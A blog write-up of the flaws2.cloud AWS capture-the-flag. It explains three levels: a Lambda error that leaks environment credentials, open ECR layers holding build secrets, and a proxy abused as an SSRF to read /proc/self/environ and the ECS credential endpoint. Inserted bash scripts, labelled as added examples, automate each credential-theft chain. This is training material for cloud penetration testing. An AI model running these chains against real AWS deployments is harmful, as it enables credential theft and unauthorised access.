Flaws2.Cloud Write Up

CyberQueenMeg · 2 min read · Jun 13, 2023

Recently, I completed the Flaws2.cloud challenge for my role as a Cloud Penetration Testing Intern at Cisco. This was a wonderful challenge that taught me a lot about the importance of proper AWS permissions and security measures. I describe how I did each of the three challenges below.

Level 1: For this level, you’ll need to enter the correct PIN code. The correct PIN is 100 digits long, so brute forcing it won’t help.

Level Explanation

  • Input validation happens only in front-end JavaScript, so it can be bypassed by calling the backend directly
  • Open the browser's developer tools (Inspector) and look at the Network tab; the PIN form calls an API Gateway endpoint that looks like 2rfismmoo8[.]execute-api.us-east-1[.]amazonaws[.]com/default/level1?code=1234
  • Change the request to 2rfismmoo8[.]execute-api.us-east-1[.]amazonaws[.]com/default/level1?code=a (a non-numeric value the code does not expect)
  • Inspect the error response in raw data mode: the Lambda function's error handler dumps its environment variables, which include the function's temporary credentials (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN)
  • Export those temporary credentials as the same environment variables in your Kali shell so the AWS CLI picks them up
  • With those credentials, list the contents of the S3 bucket behind the level's domain to see whether a static website is hosted there
  • You will find a file with "secret" in its name; opening it gives you the Level 2 link
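
The Level 1 chain as a script, added here as an example and not taken from the original write-up or from the flaws2.cloud project. It assumes the API Gateway hostname named in the write-up (used without the defanging brackets), that the static site is served from an S3 bucket whose name equals its hostname (level1.flaws2.cloud, an assumption), and that the AWS CLI and curl are installed. The error dump is a constructed stand-in shaped like a Python os.environ dump with placeholder values, not a real response; the live steps only run when FLAWS2_LIVE=1.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): flaws2.cloud Level 1.
# Assumptions: API endpoint as given in the write-up; bucket name equals the
# level's hostname. Nothing touches the network unless FLAWS2_LIVE=1.

API='https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1'
LEVEL1_BUCKET='level1.flaws2.cloud'   # assumed bucket name

# Constructed sample of a Lambda error body that dumps os.environ. The
# values are placeholders, not real credentials.
SAMPLE_DUMP="{\"errorMessage\": \"invalid literal for int(): environ({'AWS_REGION': 'us-east-1', 'AWS_ACCESS_KEY_ID': 'ASIAEXAMPLEKEY000001', 'AWS_SECRET_ACCESS_KEY': 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY', 'AWS_SESSION_TOKEN': 'IQoJb3JpZ2luX2VjEXAMPLE+token/with=chars'})\"}"

# Send a non-numeric PIN so the Lambda raises and returns its environment.
trigger_env_dump() { curl -s "${API}?code=a"; }

# Pull one variable out of the dump (stdin), tolerating 'K': 'V', "K": "V"
# and K=V. Access keys, secrets and session tokens use only [A-Za-z0-9+/=].
dump_var() {
  grep -oE "$1['\"]?[[:space:]]*[:=][[:space:]]*['\"]?[A-Za-z0-9+/=_-]+" \
    | head -n 1 \
    | sed -E "s/^$1['\"]?[[:space:]]*[:=][[:space:]]*['\"]?//"
}

# Turn the dump (stdin) into the three export lines the AWS CLI reads.
dump_to_exports() {
  local body v
  body=$(cat)
  for v in AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN; do
    printf 'export %s=%s\n' "$v" "$(printf '%s' "$body" | dump_var "$v")"
  done
}

# Use the leaked execution-role credentials to list the bucket behind the site.
list_level1_bucket() {
  eval "$(trigger_env_dump | dump_to_exports)"
  aws sts get-caller-identity           # confirm whose credentials these are
  aws s3 ls "s3://${LEVEL1_BUCKET}/"    # look for the secret-* page
}

if [ "${FLAWS2_LIVE:-0}" = 1 ]; then list_level1_bucket; fi
```

The point to check before moving on is the `aws sts get-caller-identity` output: it shows the Lambda's execution role, which is why these credentials carry the role's S3 permissions rather than the anonymous caller's.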

Level 2: This next level is running as a container at container[.]target[.]flaws2[.]cloud/. Just like S3 buckets, other resources on AWS can have open permissions. I’ll give you a hint that the ECR (Elastic Container Registry) is named “level2”.

Level Explanation

  • View the ECR images; the repository's permissions are open enough that the Level 1 credentials are sufficient
  • Get the account ID with the Level 1 credentials; it is the registry ID the ECR calls need
  • List the images in the level2 repository
  • Fetch the image from the repository and take the digest hashes of its layers
  • Get a download URL for a layer from its digest hash
  • Download and inspect the layer; the credentials created when the image was built are inside
  • Enter those credentials on the website and you will get the URL to Level 3
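
The Level 2 ECR walk as a script, added here as an example rather than code from the original write-up or the flaws2.cloud project. It assumes the Level 1 credentials are already exported, that the "level2" repository lives in us-east-1 (an assumption), and that the AWS CLI and curl are installed. The image manifest is a constructed sample with placeholder digests; only the offline manifest parsing runs unless FLAWS2_LIVE=1.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): flaws2.cloud Level 2.
# Assumes Level 1 credentials in the environment and the repo in us-east-1.
# Only layer_digests() runs offline; the AWS calls need FLAWS2_LIVE=1.

REPO='level2'
REGION='us-east-1'   # assumed

# Constructed sample of a Docker v2 image manifest; digests are placeholders.
SAMPLE_MANIFEST='{
  "schemaVersion": 2,
  "config": { "digest": "sha256:aaaabbbbccccddddaaaabbbbccccddddaaaabbbbccccddddaaaabbbbccccdddd", "size": 1 },
  "layers": [
    { "digest": "sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef", "size": 1 },
    { "digest": "sha256:fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210", "size": 1 }
  ]
}'

# The registry ID is the account that owns the repo; the write-up derives it
# from the identity behind the Level 1 credentials.
registry_id() { aws sts get-caller-identity --query Account --output text; }

# Layer digests from a manifest (stdin). Newlines are dropped first so the
# "layers" array can be isolated with sed whether or not the JSON is
# pretty-printed; the config blob digest that precedes it is excluded.
layer_digests() {
  tr -d '\n' | sed 's/.*"layers"//' | grep -oE 'sha256:[0-9a-f]{64}'
}

# Walk the repository: list images, fetch the manifest, download each layer.
pull_level2_layers() {
  local acct img manifest url d n
  acct=$(registry_id)
  img=$(aws ecr list-images --region "$REGION" --registry-id "$acct" \
          --repository-name "$REPO" --query 'imageIds[0].imageDigest' --output text)
  manifest=$(aws ecr batch-get-image --region "$REGION" --registry-id "$acct" \
          --repository-name "$REPO" --image-ids "imageDigest=$img" \
          --query 'images[0].imageManifest' --output text)
  n=0
  for d in $(printf '%s' "$manifest" | layer_digests); do
    n=$((n + 1))
    url=$(aws ecr get-download-url-for-layer --region "$REGION" --registry-id "$acct" \
          --repository-name "$REPO" --layer-digest "$d" --query downloadUrl --output text)
    curl -s -o "layer$n.tar.gz" "$url"
    # List anything credential-shaped in the layer (an .htpasswd, .env, ...).
    tar -tzf "layer$n.tar.gz" | grep -iE 'passwd|\.env|secret' || true
  done
}

if [ "${FLAWS2_LIVE:-0}" = 1 ]; then pull_level2_layers; fi
```

The manifest's config blob (the digest excluded above) is fetchable with the same get-download-url-for-layer call; it holds the image's build history, so a RUN line that created a password would appear there in clear even when the layer only contains the hashed file.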

Level 3: The container’s webserver you got access to includes a simple proxy that can be accessed at: container[.]target.flaws2[.]cloud/proxy/http://flaws[.]cloud or container[.]target[.]flaws2[.]cloud/proxy/http://neverssl[.]com

Level Explanation

  • Containers on ECS fetch their task-role credentials from 169[.]254[.]170[.]2/v2/credentials/GUID
  • The GUID comes from the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which on Linux can be read from /proc/self/environ
  • The proxy also accepts file:// URLs, so requesting container[.]target[.]flaws2[.]cloud/proxy/file:///proc/self/environ reveals our GUID
  • With the GUID, request container[.]target[.]flaws2[.]cloud/proxy/http://169[.]254[.]170[.]2/v2/credentials/GUID
  • Take the leaked credentials and use them to list S3 buckets
  • Navigate to the leaked URL for the end
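
The Level 3 chain as a script, using the proxy as an SSRF primitive, added here as an example and not code from the original write-up or the flaws2.cloud project. It assumes the proxy prefix from the write-up (used without the defanging brackets) and that curl and the AWS CLI are installed; the environ dump and credential JSON below are constructed stand-ins with placeholder values, and the live steps only run when FLAWS2_LIVE=1.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): flaws2.cloud Level 3.
# The proxy forwards both http:// and file:// URLs, which is what turns a
# "simple proxy" into a read of the task's credentials.

PROXY='http://container.target.flaws2.cloud/proxy'
ECS_CREDS_HOST='169.254.170.2'

# /proc/self/environ is NUL-separated; make it one KEY=VALUE per line.
environ_lines() { tr '\000' '\n'; }

# Constructed stand-in for what the proxy returns for file:///proc/self/environ.
sample_environ() {
  printf 'HOME=/root\000AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/11111111-2222-3333-4444-555555555555\000PATH=/usr/bin\000'
}

# Extract the relative URI (/v2/credentials/<GUID>) from a raw environ on stdin.
relative_uri() {
  environ_lines | sed -n 's/^AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=//p' | head -n 1
}

# Constructed stand-in for the credential endpoint's JSON; values are placeholders.
SAMPLE_CREDS='{"RoleArn":"arn:aws:iam::000000000000:role/level3","AccessKeyId":"ASIAEXAMPLEKEY000003","SecretAccessKey":"EXAMPLE/secret+key=","Token":"EXAMPLEtoken","Expiration":"2023-06-13T00:00:00Z"}'

# Pull one string field out of the flat JSON on stdin (no jq dependency).
json_field() {
  grep -oE "\"$1\"[[:space:]]*:[[:space:]]*\"[^\"]*\"" | head -n 1 \
    | sed -E 's/^"[^"]*"[[:space:]]*:[[:space:]]*"//; s/"$//'
}

# Convert the credential JSON (stdin) into AWS CLI export lines.
creds_to_exports() {
  local body
  body=$(cat)
  printf 'export AWS_ACCESS_KEY_ID=%s\n'     "$(printf '%s' "$body" | json_field AccessKeyId)"
  printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$(printf '%s' "$body" | json_field SecretAccessKey)"
  printf 'export AWS_SESSION_TOKEN=%s\n'     "$(printf '%s' "$body" | json_field Token)"
}

# Full chain: environ via file://, then the metadata endpoint via http://.
steal_task_creds() {
  local rel creds
  rel=$(curl -s "${PROXY}/file:///proc/self/environ" | relative_uri)
  [ -n "$rel" ] || { echo 'AWS_CONTAINER_CREDENTIALS_RELATIVE_URI not found' >&2; return 1; }
  creds=$(curl -s "${PROXY}/http://${ECS_CREDS_HOST}${rel}")
  eval "$(printf '%s' "$creds" | creds_to_exports)"
  aws sts get-caller-identity   # the task role, not the Level 1 Lambda role
  aws s3 ls                     # enumerate what that role is allowed to see
}

if [ "${FLAWS2_LIVE:-0}" = 1 ]; then steal_task_creds; fi
```

The defensive takeaway is in the first curl: a proxy that passes arbitrary schemes through to the container's own filesystem and link-local network is the whole vulnerability, and restricting it to http/https against an allow-list of hosts (with 169.254.0.0/16 denied) closes both reads.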



Written by CyberQueenMeg

GCU ‘25. DFIR Intern @ Cisco, Cybersecurity/tech nerd, musician (violin, piano, & guitar), Christian, and bug bounty hunter.
